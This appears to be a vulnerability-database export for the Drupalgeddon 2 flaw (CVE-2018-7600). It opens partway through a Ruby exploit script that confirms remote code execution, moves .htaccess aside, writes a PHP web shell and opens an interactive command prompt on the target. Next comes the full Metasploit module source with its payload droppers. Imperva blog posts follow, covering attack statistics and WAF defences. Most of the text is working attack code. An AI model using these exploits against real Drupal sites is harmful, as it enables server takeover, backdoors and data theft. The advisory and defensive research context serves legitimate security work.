\"\" : \"?q=\"\nurl = \"#{$target}#{$form}\"\n\nputs action(\"Testing: Clean URLs\")\nresponse = http_request(url, 'get', '', $session_cookie)\nif response.code == \"200\" and not response.body.empty?\n puts success(\"Result : Clean URLs enabled\")\nelse\n $clean_url = \"?q=\"\n puts warning(\"Result : Clean URLs disabled (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n\n # Drupal v8.x needs it to be enabled\n if $drupalverion.start_with?(\"8\")\n puts error(\"Sorry dave... Required for Drupal v8.x... So... NOPE NOPE NOPE\")\n exit\n elsif $drupalverion.start_with?(\"7\")\n puts info(\"Isn't an issue for Drupal v7.x\")\n end\nend\nputs \"-\"*80\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Values in gen_evil_url for Drupal v8.x\nelementsv8 = [\n \"mail\",\n \"timezone\",\n]\n# Values in gen_evil_url for Drupal v7.x\nelementsv7 = [\n \"name\",\n]\n\nelements = $drupalverion.start_with?(\"8\") ? elementsv8 : elementsv7\n\nelements.each do|e|\n $element = e\n\n # Make a request, testing code execution\n puts action(\"Testing: Code Execution (Method: #{$element})\")\n\n # Generate a random string to see if we can echo it\n random = (0...8).map { (65 + rand(26)).chr }.join\n url, payload = gen_evil_url(\"echo #{random}\", e)\n\n response = http_request(url, \"post\", payload, $session_cookie)\n if (response.code == \"200\" or response.code == \"500\") and not response.body.empty?\n result = clean_result(response.body)\n if not result.empty?\n puts success(\"Result : #{result}\")\n\n if response.body.match(/#{random}/)\n puts success(\"Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\")\n break\n\n else\n puts warning(\"WARNING: Target MIGHT be exploitable [4]... Detected output, but didn't MATCH expected result\")\n end\n\n else\n puts warning(\"WARNING: Target MIGHT be exploitable [3] (HTTP Response: #{response.code})... 
Didn't detect any INJECTED output (disabled PHP function?)\")\n end\n\n puts warning(\"WARNING: Target MIGHT be exploitable [5]... Blind attack?\") if response.code == \"500\"\n\n puts verbose(\"response.body: #{response.body}\") if $verbose\n puts verbose(\"clean_result: #{result}\") if not result.empty? and $verbose\n\n elsif response.body.empty?\n puts error(\"Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response\")\n exit\n\n else\n puts error(\"Target is NOT exploitable [1] (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n exit\n end\n\n puts \"- \"*40 if e != elements.last\nend\n\nputs \"-\"*80\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Location of web shell & used to signal if using PHP shell\nwebshellpath = \"\"\nprompt = \"drupalgeddon2\"\n\n# Possibles paths to try\npaths = [\n # Web root\n \"\",\n # Required for setup\n \"sites/default/\",\n \"sites/default/files/\",\n # They did something \"wrong\", chmod -R 0777 .\n #\"core/\",\n]\n# Check all (if doing web shell)\npaths.each do|path|\n # Check to see if there is already a file there\n puts action(\"Testing: Existing file (#{$target}#{path}#{webshell})\")\n\n response = http_request(\"#{$target}#{path}#{webshell}\", 'get', '', $session_cookie)\n if response.code == \"200\"\n puts warning(\"Response: HTTP #{response.code} // Size: #{response.size}. ***Something could already be there?***\")\n else\n puts info(\"Response: HTTP #{response.code} // Size: #{response.size}\")\n end\n\n puts \"- \"*40\n\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n folder = path.empty? ? 
\"./\" : path\n puts action(\"Testing: Writing To Web Root (#{folder})\")\n\n # Merge locations\n webshellpath = \"#{path}#{webshell}\"\n\n # Final command to execute\n cmd = \"#{bashcmd} | tee #{webshellpath}\"\n\n # By default, Drupal v7.x disables the PHP engine using: ./sites/default/files/.htaccess\n # ...however, Drupal v8.x disables the PHP engine using: ./.htaccess\n if path == \"sites/default/files/\"\n puts action(\"Moving : ./sites/default/files/.htaccess\")\n cmd = \"mv -f #{path}.htaccess #{path}.htaccess-bak; #{cmd}\"\n end\n\n # Generate evil URLs\n url, payload = gen_evil_url(cmd, $element)\n # Make the request\n response = http_request(url, \"post\", payload, $session_cookie)\n # Check result\n if response.code == \"200\" and not response.body.empty?\n # Feedback\n result = clean_result(response.body)\n puts success(\"Result : #{result}\") if not result.empty?\n\n # Test to see if backdoor is there (if we managed to write it)\n response = http_request(\"#{$target}#{webshellpath}\", \"post\", \"c=hostname\", $session_cookie)\n if response.code == \"200\" and not response.body.empty?\n puts success(\"Very Good News Everyone! Wrote to the web root! Waayheeeey!!!\")\n break\n\n elsif response.code == \"404\"\n puts warning(\"Target is NOT exploitable [2-4] (HTTP Response: #{response.code})... Might not have write access?\")\n\n elsif response.code == \"403\"\n puts warning(\"Target is NOT exploitable [2-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?\")\n\n elsif response.body.empty?\n puts warning(\"Target is NOT exploitable [2-2] (HTTP Response: #{response.code})... Got an empty response back\")\n\n else\n puts warning(\"Target is NOT exploitable [2-1] (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n end\n\n elsif response.code == \"500\" and not response.body.empty?\n puts warning(\"Target MAY of been exploited... 
Bit of blind leading the blind\")\n break\n\n elsif response.code == \"404\"\n puts warning(\"Target is NOT exploitable [1-4] (HTTP Response: #{response.code})... Might not have write access?\")\n\n elsif response.code == \"403\"\n puts warning(\"Target is NOT exploitable [1-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?\")\n\n elsif response.body.empty?\n puts warning(\"Target is NOT exploitable [1-2] (HTTP Response: #{response.code}))... Got an empty response back\")\n\n else\n puts warning(\"Target is NOT exploitable [1-1] (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n end\n\n webshellpath = \"\"\n\n puts \"- \"*40 if path != paths.last\nend if try_phpshell\n\n# If a web path was set, we exploited using PHP!\nif not webshellpath.empty?\n # Get hostname for the prompt\n prompt = response.body.to_s.strip if response.code == \"200\" and not response.body.empty?\n\n puts \"-\"*80\n puts info(\"Fake PHP shell: curl '#{$target}#{webshellpath}' -d 'c=hostname'\")\n# Should we be trying to call commands via PHP?\nelsif try_phpshell\n puts warning(\"FAILED : Couldn't find a writeable web path\")\n puts \"-\"*80\n puts action(\"Dropping back to direct OS commands\")\nend\n\n\n# Stop any CTRL + C action ;)\ntrap(\"INT\", \"SIG_IGN\")\n\n\n# Forever loop\nloop do\n # Default value\n result = \"~ERROR~\"\n\n # Get input\n command = Readline.readline(\"#{prompt}>> \", true).to_s\n\n # Check input\n puts warning(\"WARNING: Detected an known bad character (>)\") if command =~ />/\n\n # Exit\n break if command == \"exit\"\n\n # Blank link?\n next if command.empty?\n\n # If PHP web shell\n if not webshellpath.empty?\n # Send request\n result = http_request(\"#{$target}#{webshellpath}\", \"post\", \"c=#{command}\", $session_cookie).body\n # Direct OS commands\n else\n url, payload = gen_evil_url(command, $element, true)\n response = http_request(url, \"post\", payload, $session_cookie)\n\n # 
Check result\n if not response.body.empty?\n result = clean_result(response.body)\n end\n end\n\n # Feedback\n puts result\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-11-04T06:57:01", "description": "This module exploits a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n", "cvss3": {}, "published": "2018-04-14T05:22:30", "type": "metasploit", "title": "Drupal Drupalgeddon 2 Forms API Property Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT-UNIX-WEBAPP-DRUPAL_DRUPALGEDDON2-", "href": "https://www.rapid7.com/db/modules/exploit/unix/webapp/drupal_drupalgeddon2/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Drupal\n # XXX: CmdStager can't handle badchars\n include Msf::Exploit::PhpEXE\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\n 'Description' => %q{\n This module exploits a Drupal property injection in the Forms API.\n\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n },\n 'Author' => [\n 'Jasper Mattsson', # Vulnerability discovery\n 'a2u', # Proof of concept (Drupal 8.x)\n 'Nixawk', # Proof of concept (Drupal 8.x)\n 'FireFart', # Proof of concept (Drupal 7.x)\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-7600'],\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\n ['URL', 'https://greysec.net/showthread.php?tid=2912'],\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\n ['URL', 
'https://github.com/a2u/CVE-2018-7600'],\n ['URL', 'https://github.com/nixawk/labs/issues/19'],\n ['URL', 'https://github.com/FireFart/CVE-2018-7600']\n ],\n 'DisclosureDate' => '2018-03-28',\n 'License' => MSF_LICENSE,\n 'Platform' => ['php', 'unix', 'linux'],\n 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Payload' => {'BadChars' => '&>\\''},\n 'Targets' => [\n #\n # Automatic targets (PHP, cmd/unix, native)\n #\n ['Automatic (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php_memory\n ],\n ['Automatic (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php_dropper\n ],\n ['Automatic (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory\n ],\n ['Automatic (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n ],\n #\n # Drupal 7.x targets (PHP, cmd/unix, native)\n #\n ['Drupal 7.x (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :php_memory\n ],\n ['Drupal 7.x (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :php_dropper\n ],\n ['Drupal 7.x (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :unix_memory\n ],\n ['Drupal 7.x (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Version' => Rex::Version.new('7'),\n 'Type' => :linux_dropper\n ],\n #\n # Drupal 8.x targets (PHP, cmd/unix, native)\n #\n ['Drupal 8.x (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :php_memory\n ],\n ['Drupal 8.x (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :php_dropper\n ],\n ['Drupal 8.x (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => 
Rex::Version.new('8'),\n 'Type' => :unix_memory\n ],\n ['Drupal 8.x (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Version' => Rex::Version.new('8'),\n 'Type' => :linux_dropper\n ]\n ],\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\n 'DefaultOptions' => {'WfsDelay' => 2}, # Also seconds between attempts\n 'Notes' => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}\n ))\n\n register_options([\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\n OptBool.new('DUMP_OUTPUT', [false, 'Dump payload command output', false])\n ])\n\n register_advanced_options([\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\n ])\n end\n\n def check\n checkcode = CheckCode::Unknown\n\n @version = target['Version'] || drupal_version\n\n unless @version\n vprint_error('Could not determine Drupal version to target')\n return checkcode\n end\n\n vprint_status(\"Drupal #{@version} targeted at #{full_uri}\")\n checkcode = CheckCode::Detected\n\n changelog = drupal_changelog(@version)\n\n unless changelog\n vprint_error('Could not determine Drupal patch level')\n return checkcode\n end\n\n case drupal_patch(changelog, 'SA-CORE-2018-002')\n when nil\n vprint_warning('CHANGELOG.txt no longer contains patch level')\n when true\n vprint_warning('Drupal appears patched in CHANGELOG.txt')\n checkcode = CheckCode::Safe\n when false\n vprint_good('Drupal appears unpatched in CHANGELOG.txt')\n checkcode = CheckCode::Appears\n end\n\n # NOTE: Exploiting the vuln will move us from \"Safe\" to Vulnerable\n token = rand_str\n res = execute_command(token, func: 'printf')\n\n return checkcode unless res\n\n if res.body.start_with?(token)\n vprint_good('Drupal is vulnerable to code execution')\n checkcode = CheckCode::Vulnerable\n end\n\n checkcode\n end\n\n def exploit\n unless @version\n print_warning('Targeting Drupal 7.x as a fallback')\n @version = Rex::Version.new('7')\n end\n\n if datastore['PAYLOAD'] == 
'cmd/unix/generic'\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\n # XXX: Naughty datastore modification\n datastore['DUMP_OUTPUT'] = true\n end\n\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\n case target['Type']\n when :php_memory\n execute_command(payload.encoded, func: 'assert')\n\n sleep(wfs_delay)\n return if session_created?\n\n # XXX: This will spawn a *very* obvious process\n execute_command(\"php -r '#{payload.encoded}'\")\n when :unix_memory\n execute_command(payload.encoded)\n when :php_dropper, :linux_dropper\n dropper_assert\n\n sleep(wfs_delay)\n return if session_created?\n\n dropper_exec\n end\n end\n\n def dropper_assert\n php_file = Pathname.new(\n \"#{datastore['WritableDir']}/#{rand_str}.php\"\n ).cleanpath\n\n # Return the PHP payload or a PHP binary dropper\n dropper = get_write_exec_payload(\n writable_path: datastore['WritableDir'],\n unlink_self: true # Worth a shot\n )\n\n # Encode away potential badchars with Base64\n dropper = Rex::Text.encode_base64(dropper)\n\n # Stage 1 decodes the PHP and writes it to disk\n stage1 = %Q{\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\n }\n\n # Stage 2 executes said PHP in-process\n stage2 = %Q{\n include_once(\"#{php_file}\");\n }\n\n # :unlink_self may not work, so let's make sure\n register_file_for_cleanup(php_file)\n\n # Hopefully pop our shell with assert()\n execute_command(stage1.strip, func: 'assert')\n execute_command(stage2.strip, func: 'assert')\n end\n\n def dropper_exec\n php_file = \"#{rand_str}.php\"\n tmp_file = Pathname.new(\n \"#{datastore['WritableDir']}/#{php_file}\"\n ).cleanpath\n\n # Return the PHP payload or a PHP binary dropper\n dropper = get_write_exec_payload(\n writable_path: datastore['WritableDir'],\n unlink_self: true # Worth a shot\n )\n\n # Encode away potential badchars with Base64\n dropper = Rex::Text.encode_base64(dropper)\n\n # :unlink_self may not work, so let's make sure\n 
register_file_for_cleanup(php_file)\n\n # Write the payload or dropper to disk (!)\n # NOTE: Analysis indicates > is a badchar for 8.x\n execute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\")\n\n # Attempt in-process execution of our PHP script\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, php_file)\n )\n\n sleep(wfs_delay)\n return if session_created?\n\n # Try to get a shell with PHP CLI\n execute_command(\"php #{php_file}\")\n\n sleep(wfs_delay)\n return if session_created?\n\n register_file_for_cleanup(tmp_file)\n\n # Fall back on our temp file\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\n execute_command(\"php #{tmp_file}\")\n end\n\n def execute_command(cmd, opts = {})\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\n\n vprint_status(\"Executing with #{func}(): #{cmd}\")\n\n res =\n case @version.to_s\n when /^7\\b/\n exploit_drupal7(func, cmd)\n when /^8\\b/\n exploit_drupal8(func, cmd)\n end\n\n return unless res\n\n if res.code == 200\n print_line(res.body) if datastore['DUMP_OUTPUT']\n else\n print_error(\"Unexpected reply: #{res.inspect}\")\n end\n\n res\n end\n\n def exploit_drupal7(func, code)\n vars_get = {\n 'q' => 'user/password',\n 'name[#post_render][]' => func,\n 'name[#markup]' => code,\n 'name[#type]' => 'markup'\n }\n\n vars_post = {\n 'form_id' => 'user_pass',\n '_triggering_element_name' => 'name'\n }\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n\n return res unless res && res.code == 200\n\n form_build_id = res.get_html_document.at(\n '//input[@name = \"form_build_id\"]/@value'\n )\n\n return res unless form_build_id\n\n vars_get = {\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\n }\n\n vars_post = {\n 'form_build_id' => form_build_id.value\n }\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 
'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n end\n\n def exploit_drupal8(func, code)\n # Clean URLs are enabled by default and \"can't\" be disabled\n uri = normalize_uri(target_uri.path, 'user/register')\n\n vars_get = {\n 'element_parents' => 'account/mail/#value',\n 'ajax_form' => 1,\n '_wrapper_format' => 'drupal_ajax'\n }\n\n vars_post = {\n 'form_id' => 'user_register_form',\n '_drupal_ajax' => 1,\n 'mail[#type]' => 'markup',\n 'mail[#post_render][]' => func,\n 'mail[#markup]' => code\n }\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n end\n\n def rand_str\n Rex::Text.rand_text_alphanumeric(8..42)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/drupal_drupalgeddon2.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "impervablog": [{"lastseen": "2018-04-27T04:45:34", "description": "Ever since March 28th, when Drupal published a patch for a RCE named Drupalgeddon 2.0 (SA-CORE-2018-002/[CVE-2018-7600](<https://www.drupal.org/sa-core-2018-002>)), Imperva has been monitoring our cloud looking for hackers\u2019 attempts to exploit the vulnerability, but found nothing. Until today.\n\nIt somehow seems fitting that nefarious activity picked up today, Friday the 13th. After a [POC exploit](<https://research.checkpoint.com/uncovering-drupalgeddon-2/>) was released, our monitoring services showed that hackers are finally starting to catch up! Since the RCE exploit was publicly disclosed two weeks ago, they could have been working on their own exploits, but didn\u2019t.\n\n## Lazy Hackers\n\nAs usual when exploits become known, we go into hyper-awareness mode looking for security events (and of course, protecting our customers), but no events were identified. Not a single attack. 
We reached out to some of our teammates looking for answers, asking if they had deleted events, but no\u2014it\u2019s simply that no one attempted to exploit this newfound bug, and it took them two whole weeks to reverse the patch.\n\nIt appeared every one of the black hats was waiting for someone else to do the research and share the exploit. Perhaps most hackers don\u2019t care for the actual work of finding ways to exploit a vulnerability. They just wait until something is public and then use it to attack. Before that, we saw almost no traffic whatsoever!\n\n## Attack Data\n\nThe chart below is just the beginning of the numbers we\u2019re now seeing in our cloud, and they are continuing to rise (Figure 1).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-date.png>)\n\n_Figure 1: Attacks by date_\n\nSo far, we have seen that 90% of the attack attempts are scanners, 3% are backdoor infection attempts, and 2% are attempts to run crypto miners on the targets (Figure 2).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-distribution-type.png>)\n\n_Figure 2: Attacks by distribution type_\n\nAlso, most of the attacks originated from the US (53%) and China (45%) (Figure 3).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-geo.png>)\n\n_Figure 3: Location source of attacks_\n\n## Imperva Customers Protected\n\nWe applied a virtual patch to Imperva SecureSphere and Incapsula WAF customers within hours of identifying the RCE vulnerability. A virtual patch is a compensating control that blocks known exploit patterns at the WAF; it does not replace upgrading Drupal itself to a fixed release.\n\nIn addition to our zero-day protection rules that spotted this attack, we also published a new dedicated security rule to provide maximum protection to Imperva SecureSphere and Incapsula WAF customers against this vulnerability.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-13T19:13:25", "type": "impervablog", "title": "Drupalgeddon 2.0: Are Hackers Slacking Off?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T19:13:25", "id": "IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "href": "https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-13T21:29:37", "description": "\n\nAttacks on applications can be divided into two types: targeted attacks and \u201cspray and pray\u201d attacks. Targeted attacks require planning and usually include a reconnaissance phase, where attackers learn all they can about the target organization\u2019s IT stack and application layers. Targeted application attacks are vastly outnumbered by spray and pray attacks. The perpetrators of spray and pray attacks are less discriminating about their victims. Their goal is to find and steal anything that can be leveraged or [sold on the dark web](<https://medium.com/beyond-the-perimeter/over-750-000-debit-and-credit-cards-for-sale-found-on-the-deep-web-434e050ac59f>). 
Sometimes spray and pray attacks are used for reconnaissance, and later develop into a targeted attack. \n\nOne famous wave of spray and pray attacks took place against Drupal, the popular open-source content management system (CMS). In March 2018, Drupal reported a highly critical vulnerability ([CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>)) that earned the nickname, Drupalgeddon 2. This vulnerability enables an attacker to run arbitrary code on common Drupal versions, affecting millions of websites. Tools exploiting this weakness became [widely available](<https://github.com/dreadlocked/Drupalgeddon2>), which caused the [number of attacks on Drupal sites to explode](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>).\n\nThe ability to identify spray and pray attacks is an important insight for security personnel. It can help them prioritize which attacks to investigate, evaluate the true risk to their application, and/or identify a sniffing attack that could be a precursor to a more serious targeted one.\n\n**Identifying Spray and Pray Attacks in Attack Analytics **\n\n[Attack Analytics](<https://www.imperva.com/products/attack-analytics/>), launched in May 2018, aims to crush the maddening pace of alerts that security teams receive. For security analysts unable to triage this alert avalanche, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigate-able incidents. Powered by artificial intelligence, Attack Analytics automates what would take a team of security analysts days to investigate and cuts that investigation time down to a matter of minutes.\n\nWe recently updated Attack Analytics to provide a list of spray and pray attacks that may hit your business as part of a larger campaign. We researched these attacks using crowdsourced attack data gathered with permission from our customers. 
This insight is now presented in our Attack Analytics dashboard, as can be seen in the red circled portion of Figure 1 below. \n\n_Figure 1: Attack Analytics Dashboard_\n\nClicking on the Similar Incidents Insights section shows more detail on the related attacks (Figure 2). An alternative way to get the list of spray and pray incidents potentially affecting the user is to login to the console and use the \u201cHow common\u201d filter.\n\n_Figure 2: Attack Analytics Many Customers Filter_\n\n \n\nA closer view of the incidents will tell you the common attributes of the attack affecting other users (Figure 3).\n\n_Figure 3: Attack Analytics Incident Insights_\n\n**How Our Algorithm Works**\n\nThe algorithm that identifies spray and pray attacks examines incidents across Attack Analytics customers. When there are similar incidents across a large number of customers in a close amount of time, we identify this as a likely spray and pray attack originating from the same source. Determining the similarity of incidents requires domain knowledge, and is based on a combination of factors, such as:\n\n * The attack source: Network source (IP/Subnet), Geographic location\n * The attack target: URL, Host, Parameters\n * The attack time: Duration, Frequency\n * The attack type: Triggered rule\n * The attack tool: Tool name, type & parameters \n\nIn some spray and pray attacks, the origin of the attack is the most valuable piece of information connecting multiple incidents. When it is a distributed attack, the origin of the attack is not relevant, while other factors are relevant. In many cases, a spray and pray attack will be aimed at the same group of URLs.\n\nAnother significant common factor is the attack type, in particular, a similar set of rules that were violated in the Web Application Firewall (WAF). Sometimes, the same tools are observed, or the tools belong to the same type of attacks. 
The time element is also key, especially the duration of the attack or the frequency.\n\n**Results and Findings**\n\nThe Attack Analytics algorithm is designed to identify groups of cross-account incidents. Each group has a set of common features that ties the incidents together. When we reviewed the results and the characteristics of various groupings, we discovered interesting patterns. First, most attacks (83.3%) were common among customers (Figure 4). Second, most attacks (67.4%) belong to groups with a single source, meaning the attack came from the same IP address. Third, Bad Bot attacks still have a significant presence (41.1%). In 14.8% of the attacks, a common resource (like a URL) is attacked.\n\n_Figure 4: Spray & Pray Incidents Spread _\n\nHere\u2019s an interesting example - a spray and pray attack from a single IP that attacked 1,368 customers in the same 3 consecutive days with the same vulnerability scanner, LTX71. We\u2019ve also seen Bad Bots illegally accessing resources, attacking from the same subnet located in Illinois using a Trustwave vulnerability scanner. These bots performed a URL scan on our customers\u2019 resources - an attack which was blocked by our Web Application Firewall (WAF). Another attack involved a German IP trying to access the same WordPress-created system files on more than 50 different customers with [cURL](<https://www.hackingarticles.in/web-application-penetration-testing-curl/>). And the list goes on.\n\nFocusing on single-source spray and pray incidents has shown that these attacks affect a significant percentage of our customers. For example, in Figure 5 we see that the leading attack came from one Ukrainian IP that hit at least 18.49% of our customers. Almost every day, one malicious IP would attack a significant percentage of our customers. 
\n\n_Figure 5: Single Source Spray & Pray Accounts Affected_\n\n**More Actionable Insights Coming**\n\nIdentifying spray and pray attacks is a great example of using the intelligence from Imperva\u2019s customer community to create insights that will help speed up your security investigations. Spray and pray attacks are not the only way of adding insights from community knowledge. Using machine-learning algorithms combined with domain knowledge, we plan to add more security insights like these to our Attack Analytics dashboard in the near future. \n\nThe post [How Imperva's New Attack Crowdsourcing Secures Your Business's Applications](<https://www.imperva.com/blog/how-impervas-new-attack-crowdsourcing-secures-your-businesss-applications/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-02-13T12:52:46", "type": "impervablog", "title": "How Imperva\u2019s New Attack Crowdsourcing Secures Your Business\u2019s Applications", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-02-13T12:52:46", "id": 
"IMPERVABLOG:A20D453136A0817CB6973C79EBE9F6D1", "href": "https://www.imperva.com/blog/how-impervas-new-attack-crowdsourcing-secures-your-businesss-applications/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-27T14:50:26", "description": "\n\n_(**Jan. 12 update: ** Due to a data transfer error, some of the 2017 figures were incorrectly reported; this version of the blog has been corrected. This error did not affect our 2018 statistics, nor our conclusions.)_\n\nAs a web application firewall provider, part of our job at Imperva is to continually monitor for new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrates it into a single repository, and assesses each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide an analysis of all web application vulnerabilities throughout the year, view trends, and notice significant changes in the security landscape. As we did _[last year](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we took a look back at 2018 to understand the changes and trends in web application security over the past year.\n\nThe bad news is that in 2018, like _[2017](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we continued to see a **trend of increasing number of web application vulnerabilities**, particularly vulnerabilities related to _[injection](<https://www.owasp.org/index.php/Top_10-2017_A1-Injection>)_ such as _[SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>)_, command injection, object injection, etc. 
